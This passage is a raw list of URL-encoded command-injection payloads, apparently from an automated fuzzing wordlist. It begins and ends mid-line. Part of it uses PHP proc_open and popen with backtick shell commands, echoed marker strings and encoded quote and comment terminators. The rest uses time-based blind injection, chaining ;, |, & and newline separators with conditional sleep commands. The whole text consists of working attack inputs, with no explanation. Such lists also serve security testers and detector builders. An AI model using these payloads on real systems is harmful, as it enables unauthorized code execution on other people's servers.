OEOK`.`echo%20KDOEOK`)%3B//KDOEOK\n${proc_open(print(`echo%20RTNMAU;echo%20$((3%2B92));echo%20RTNMAU;echo%20RTNMAU`)%3B//RTNMAU\n${proc_open(print(`echo%20HEDLVC%0aecho%20$((95%2B18))%0aecho%20HEDLVC%0aecho%20HEDLVC`)%3B//HEDLVC\n${proc_open(print(`echo%20KNDTDG\\necho%20$((98%2B53))\\necho%20KNDTDG\\necho%20KNDTDG`)%3B//KNDTDG\n${proc_open(print(`echo%20BBSVGQ`.`echo%20$((42%2B81))`.`echo%20BBSVGQ`.`echo%20BBSVGQ`)%3B%23BBSVGQ\n${proc_open(print(`echo%20LUFXAF;echo%20$((85%2B77));echo%20LUFXAF;echo%20LUFXAF`)%3B%2523LUFXAF\n${proc_open(print(`echo%20BPIHJI%0aecho%20$((94%2B16))%0aecho%20BPIHJI%0aecho%20BPIHJI`)%3B%252523BPIHJI\n${proc_open(print(`echo%20SRVISB\\necho%20$((34%2B18))\\necho%20SRVISB\\necho%20SRVISB`)%3B%25252523SRVISB\n${proc_open(print(`echo%20KZLOGK`.`echo%20$((4%2B23))`.`echo%20KZLOGK`.`echo%20KZLOGK`)%3B.%22KZLOGK\n${proc_open(print(`echo%20MLSOYZ;echo%20$((72%2B12));echo%20MLSOYZ;echo%20MLSOYZ`)%3B.%2522MLSOYZ\n${proc_open(print(`echo%20JXTIWP%0aecho%20$((97%2B60))%0aecho%20JXTIWP%0aecho%20JXTIWP`)%3B.%252522JXTIWP\n${proc_open(print(`echo%20EBZMPW\\necho%20$((54%2B99))\\necho%20EBZMPW\\necho%20EBZMPW`)%3B.%25252522EBZMPW\n${proc_open(print(`echo%20CPKMZS`.`echo%20$((71%2B91))`.`echo%20CPKMZS`.`echo%20CPKMZS`)%3B.%27CPKMZS\n${proc_open(print(`echo%20HWBQFG;echo%20$((79%2B43));echo%20HWBQFG;echo%20HWBQFG`)%3B.%2527HWBQFG\n${proc_open(print(`echo%20TDPGNL%0aecho%20$((89%2B52))%0aecho%20TDPGNL%0aecho%20TDPGNL`)%3B.%252527TDPGNL\n${proc_open(print(`echo%20JQUEEX\\necho%20$((81%2B77))\\necho%20JQUEEX\\necho%20JQUEEX`)%3B.%25252527JQUEEX\n${proc_open(print(`echo%20EALLNU`.`echo%20$((18%2B91))`.`echo%20EALLNU`.`echo%20EALLNU`)%29%7DEALLNU\n${proc_open(print(`echo%20RMMUOG;echo%20$((61%2B62));echo%20RMMUOG;echo%20RMMUOG`)%3B%2529%257DRMMUOG\n${proc_open(print(`echo%20TWETUM%0aecho%20$((82%2B35))%0aecho%20TWETUM%0aecho%20TWETUM`)%3B%252529%25257DTWETUM\n${proc_open(print(`echo%20GSEIBK\\necho%20$((71%2B35))\\necho%20GSEIBK\\necho%20GSEIBK`)%3B%25252529%2525257DGSEIBK\n${popen(print(`echo%20VGNVLG`.`echo%20$((76%2B39))`.`echo%20VGNVLG`.`echo%20VGNVLG`)%3BVGNVLG\n${popen(print(`echo%20IWFPXG;echo%20$((92%2B70));echo%20IWFPXG;echo%20IWFPXG`)%3BIWFPXG\n${popen(print(`echo%20RWKSAH%0aecho%20$((18%2B34))%0aecho%20RWKSAH%0aecho%20RWKSAH`)%3BRWKSAH\n${popen(print(`echo%20TBFYMH\\necho%20$((44%2B94))\\necho%20TBFYMH\\necho%20TBFYMH`)%3BTBFYMH\n${popen(print(`echo%20YYAFET`.`echo%20$((62%2B68))`.`echo%20YYAFET`.`echo%20YYAFET`)%3B%5C%5CYYAFET\n${popen(print(`echo%20ATLEFF;echo%20$((90%2B9));echo%20ATLEFF;echo%20ATLEFF`)%3B%255C%255CATLEFF\n${popen(print(`echo%20JDFWVW%0aecho%20$((92%2B86))%0aecho%20JDFWVW%0aecho%20JDFWVW`)%3B%25255C%25255CJDFWVW\n${popen(print(`echo%20UQCXVD\\necho%20$((60%2B78))\\necho%20UQCXVD\\necho%20UQCXVD`)%3B%2525255C%2525255CUQCXVD\n${popen(print(`echo%20PBSYUK`.`echo%20$((49%2B23))`.`echo%20PBSYUK`.`echo%20PBSYUK`)%3B//PBSYUK\n${popen(print(`echo%20UYCUPP;echo%20$((99%2B36));echo%20UYCUPP;echo%20UYCUPP`)%3B//UYCUPP\n${popen(print(`echo%20AHQLIX%0aecho%20$((35%2B21))%0aecho%20AHQLIX%0aecho%20AHQLIX`)%3B//AHQLIX\n${popen(print(`echo%20RWZIYD\\necho%20$((45%2B92))\\necho%20RWZIYD\\necho%20RWZIYD`)%3B//RWZIYD\n${popen(print(`echo%20XGFDZU`.`echo%20$((14%2B6))`.`echo%20XGFDZU`.`echo%20XGFDZU`)%3B%23XGFDZU\n${popen(print(`echo%20VDXXJI;echo%20$((50%2B12));echo%20VDXXJI;echo%20VDXXJI`)%3B%2523VDXXJI\n${popen(print(`echo%20UWOAFS%0aecho%20$((11%2B42))%0aecho%20UWOAFS%0aecho%20UWOAFS`)%3B%252523UWOAFS\n${popen(print(`echo%20KCHOPX\\necho%20$((77%2B78))\\necho%20KCHOPX\\necho%20KCHOPX`)%3B%25252523KCHOPX\n${popen(print(`echo%20PBZYGX`.`echo%20$((38%2B4))`.`echo%20PBZYGX`.`echo%20PBZYGX`)%3B.%22PBZYGX\n${popen(print(`echo%20FRWTRM;echo%20$((11%2B41));echo%20FRWTRM;echo%20FRWTRM`)%3B.%2522FRWTRM\n${popen(print(`echo%20LSIFOR%0aecho%20$((86%2B39))%0aecho%20LSIFOR%0aecho%20LSIFOR`)%3B.%252522LSIFOR\n${popen(print(`echo%20FJKMCS\\necho%20$((43%2B2))\\necho%20FJKMCS\\necho%20FJKMCS`)%3B.%25252522FJKMCS\n${popen(print(`echo%20XZRRJD`.`echo%20$((95%2B86))`.`echo%20XZRRJD`.`echo%20XZRRJD`)%3B.%27XZRRJD\n${popen(print(`echo%20MVEAQD;echo%20$((64%2B58));echo%20MVEAQD;echo%20MVEAQD`)%3B.%2527MVEAQD\n${popen(print(`echo%20BZEAYT%0aecho%20$((11%2B35))%0aecho%20BZEAYT%0aecho%20BZEAYT`)%3B.%252527BZEAYT\n${popen(print(`echo%20ZTPGAU\\necho%20$((52%2B3))\\necho%20ZTPGAU\\necho%20ZTPGAU`)%3B.%25252527ZTPGAU\n${popen(print(`echo%20LBEVLL`.`echo%20$((2%2B31))`.`echo%20LBEVLL`.`echo%20LBEVLL`)%29%7DLBEVLL\n${popen(print(`echo%20BZLGPL;echo%20$((70%2B63));echo%20BZLGPL;echo%20BZLGPL`)%3B%2529%257DBZLGPL\n${popen(print(`echo%20SLXBWN%0aecho%20$((29%2B57))%0aecho%20SLXBWN%0aecho%20SLXBWN`)%3B%252529%25257DSLXBWN\n${popen(print(`echo%20QDXUDJ\\necho%20$((17%2B75))\\necho%20QDXUDJ\\necho%20QDXUDJ`)%3B%25252529%2525257DQDXUDJ\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20ZSSQMT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%7C%20%5B%201%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%202%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%203%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%204%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%205%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%206%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%207%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%208%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%209%20-ne%20%24%28echo%20RBBJAR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHNNQT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%7C%20%5B%201%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%202%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%203%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%204%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%205%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%206%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%207%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%208%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%209%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%7C%20%5B%201%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%202%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%203%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%204%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%205%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%206%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%207%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%208%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%209%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%